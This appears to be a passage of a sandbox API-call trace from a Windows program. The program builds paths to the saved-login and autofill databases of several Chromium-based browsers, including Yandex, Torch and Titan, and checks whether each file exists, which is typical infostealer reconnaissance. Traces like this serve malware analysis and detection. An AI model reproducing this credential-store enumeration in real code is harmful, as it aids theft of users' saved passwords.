[0234.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.166] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0234.166] GetProcessHeap () returned 0x740000 [0234.167] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.167] GetProcessHeap () returned 0x740000 [0234.167] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.167] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.168] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 71 [0234.168] GetProcessHeap () returned 0x740000 [0234.168] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x92) returned 0x75bde8 [0234.168] GetProcessHeap () returned 0x740000 [0234.169] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.169] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0234.170] GetProcessHeap () returned 0x740000 [0234.170] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.170] GetProcessHeap () returned 0x740000 [0234.170] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.170] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.171] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 54 [0234.171] GetProcessHeap () returned 0x740000 [0234.171] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x70) returned 0x75bdc8 [0234.171] GetProcessHeap () returned 0x740000 [0234.172] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.173] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 0 [0234.173] GetProcessHeap () returned 0x740000 [0234.174] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.174] GetProcessHeap () returned 0x740000 [0234.174] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.175] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.176] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 62 [0234.176] GetProcessHeap () returned 0x740000 [0234.176] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75bdd8 [0234.176] GetProcessHeap () returned 0x740000 [0234.176] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.178] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0234.178] GetProcessHeap () returned 0x740000 [0234.178] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.178] GetProcessHeap () returned 0x740000 [0234.178] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.179] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.272] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 73 [0234.272] GetProcessHeap () returned 0x740000 [0234.272] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x96) returned 0x75bdf0 [0234.272] GetProcessHeap () returned 0x740000 [0234.272] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.274] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0234.274] GetProcessHeap () returned 0x740000 [0234.274] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.275] GetProcessHeap () returned 0x740000 [0234.275] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.275] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.276] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 71 [0234.276] GetProcessHeap () returned 0x740000 [0234.277] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x92) returned 0x75bde8 [0234.277] GetProcessHeap () returned 0x740000 [0234.278] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.279] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0234.280] GetProcessHeap () returned 0x740000 [0234.280] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.280] GetProcessHeap () returned 0x740000 [0234.280] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.281] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.282] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 54 [0234.282] GetProcessHeap () returned 0x740000 [0234.282] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x70) returned 0x75bdc8 [0234.282] GetProcessHeap () returned 0x740000 [0234.283] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.284] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 0 [0234.284] GetProcessHeap () returned 0x740000 [0234.284] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.284] GetProcessHeap () returned 0x740000 [0234.284] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.285] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.286] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 62 [0234.286] GetProcessHeap () returned 0x740000 [0234.286] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75bdd8 [0234.286] GetProcessHeap () returned 0x740000 [0234.287] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.288] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0234.289] GetProcessHeap () returned 0x740000 [0234.289] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.289] GetProcessHeap () returned 0x740000 [0234.289] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.290] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.291] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 70 [0234.291] GetProcessHeap () returned 0x740000 [0234.291] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x90) returned 0x75bdf0 [0234.291] GetProcessHeap () returned 0x740000 [0234.292] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.293] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0234.293] GetProcessHeap () returned 0x740000 [0234.294] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.294] GetProcessHeap () returned 0x740000 [0234.294] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.295] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.296] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 68 [0234.296] GetProcessHeap () returned 0x740000 [0234.296] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8c) returned 0x75bde8 [0234.297] GetProcessHeap () returned 0x740000 [0234.297] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.299] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0234.299] GetProcessHeap () returned 0x740000 [0234.299] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.299] GetProcessHeap () returned 0x740000 [0234.299] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.301] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.301] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 51 [0234.302] GetProcessHeap () returned 0x740000 [0234.302] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6a) returned 0x75bdc8 [0234.302] GetProcessHeap () returned 0x740000 [0234.302] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.303] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 0 [0234.303] GetProcessHeap () returned 0x740000 [0234.303] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.304] GetProcessHeap () returned 0x740000 [0234.304] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.304] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.305] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 59 [0234.305] GetProcessHeap () returned 0x740000 [0234.305] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75bdd8 [0234.305] GetProcessHeap () returned 0x740000 [0234.305] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.306] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0234.306] GetProcessHeap () returned 0x740000 [0234.307] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.307] GetProcessHeap () returned 0x740000 [0234.307] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.307] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.309] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 73 [0234.390] GetProcessHeap () returned 0x740000 [0234.390] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x96) returned 0x75bdf0 [0234.391] GetProcessHeap () returned 0x740000 [0234.391] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.392] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0234.392] GetProcessHeap () returned 0x740000 [0234.393] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.393] GetProcessHeap () returned 0x740000 [0234.393] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.393] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.394] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 71 [0234.394] GetProcessHeap () returned 0x740000 [0234.394] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x92) returned 0x75bde8 [0234.394] GetProcessHeap () returned 0x740000 [0234.395] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.396] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0234.396] GetProcessHeap () returned 0x740000 [0234.396] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.396] GetProcessHeap () returned 0x740000 [0234.396] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.397] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.397] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 54 [0234.397] GetProcessHeap () returned 0x740000 [0234.397] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x70) returned 0x75bdc8 [0234.397] GetProcessHeap () returned 0x740000 [0234.398] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.399] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 0 [0234.399] GetProcessHeap () returned 0x740000 [0234.399] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.399] GetProcessHeap () returned 0x740000 [0234.399] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.400] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.401] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 62 [0234.402] GetProcessHeap () returned 0x740000 [0234.402] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x80) returned 0x75bdd8 [0234.402] GetProcessHeap () returned 0x740000 [0234.402] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.403] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0234.403] GetProcessHeap () returned 0x740000 [0234.404] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.404] GetProcessHeap () returned 0x740000 [0234.404] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.405] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.405] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 78 [0234.405] GetProcessHeap () returned 0x740000 [0234.405] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0) returned 0x74ac38 [0234.405] GetProcessHeap () returned 0x740000 [0234.406] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.407] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0234.407] GetProcessHeap () returned 0x740000 [0234.407] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ac38 | out: hHeap=0x740000) returned 1 [0234.407] GetProcessHeap () returned 0x740000 [0234.407] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.408] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.409] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 76 [0234.409] GetProcessHeap () returned 0x740000 [0234.409] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9c) returned 0x74a650 [0234.409] GetProcessHeap () returned 0x740000 [0234.409] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.410] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0234.410] GetProcessHeap () returned 0x740000 [0234.410] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74a650 | out: hHeap=0x740000) returned 1 [0234.410] GetProcessHeap () returned 0x740000 [0234.410] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.411] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.412] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 59 [0234.413] GetProcessHeap () returned 0x740000 [0234.413] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75bdc8 [0234.413] GetProcessHeap () returned 0x740000 [0234.413] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.414] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0234.414] GetProcessHeap () returned 0x740000 [0234.415] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.415] GetProcessHeap () returned 0x740000 [0234.415] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.415] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.416] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 67 [0234.416] GetProcessHeap () returned 0x740000 [0234.416] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8a) returned 0x75bdd8 [0234.416] GetProcessHeap () returned 0x740000 [0234.417] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.417] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0234.418] GetProcessHeap () returned 0x740000 [0234.418] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.418] GetProcessHeap () returned 0x740000 [0234.418] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.419] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.419] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 70 [0234.419] GetProcessHeap () returned 0x740000 [0234.419] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x90) returned 0x75bdf0 [0234.420] GetProcessHeap () returned 0x740000 [0234.420] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.421] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0234.421] GetProcessHeap () returned 0x740000 [0234.422] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.422] GetProcessHeap () returned 0x740000 [0234.422] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.422] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.423] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 68 [0234.423] GetProcessHeap () returned 0x740000 [0234.423] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8c) returned 0x75bde8 [0234.423] GetProcessHeap () returned 0x740000 [0234.424] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.425] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0234.425] GetProcessHeap () returned 0x740000 [0234.425] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0234.425] GetProcessHeap () returned 0x740000 [0234.425] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.523] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.525] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 51 [0234.525] GetProcessHeap () returned 0x740000 [0234.525] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6a) returned 0x75bdc8 [0234.525] GetProcessHeap () returned 0x740000 [0234.525] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.527] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 0 [0234.528] GetProcessHeap () returned 0x740000 [0234.528] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.528] GetProcessHeap () returned 0x740000 [0234.528] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.529] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.530] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 59 [0234.530] GetProcessHeap () returned 0x740000 [0234.530] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7a) returned 0x75bdd8 [0234.530] GetProcessHeap () returned 0x740000 [0234.531] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.532] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0234.532] GetProcessHeap () returned 0x740000 [0234.533] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.533] GetProcessHeap () returned 0x740000 [0234.533] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.534] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.535] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 85 [0234.535] GetProcessHeap () returned 0x740000 [0234.535] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xae) returned 0x75bdf0 [0234.535] GetProcessHeap () returned 0x740000 [0234.535] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.536] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0234.537] GetProcessHeap () returned 0x740000 [0234.537] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.537] GetProcessHeap () returned 0x740000 [0234.537] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.538] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.539] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 83 [0234.539] GetProcessHeap () returned 0x740000 [0234.539] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xaa) returned 0x75bde8 [0234.539] GetProcessHeap () returned 0x740000 [0234.539] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.540] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0234.540] 